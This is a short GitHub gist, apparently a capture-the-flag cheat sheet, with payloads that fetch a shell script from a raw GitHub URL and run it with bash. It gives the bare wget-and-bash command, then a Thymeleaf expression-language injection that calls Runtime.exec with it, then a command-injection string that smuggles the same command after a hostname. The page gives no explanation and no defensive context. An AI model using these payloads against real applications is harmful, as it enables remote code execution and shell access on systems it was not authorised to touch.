Skip to content

Instantly share code, notes, and snippets.

@matuhn
Created July 9, 2019 08:44
Show Gist options
  • Save matuhn/64bc75b1b1ca7e8823bbe9e0e365e91c to your computer and use it in GitHub Desktop.
Save matuhn/64bc75b1b1ca7e8823bbe9e0e365e91c to your computer and use it in GitHub Desktop.
wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh
bash shell.sh
EL Injection:
<p th:text="${T(java.lang.Runtime).getRuntime().exec('wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}" ></p>
RCE:
google.com;wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment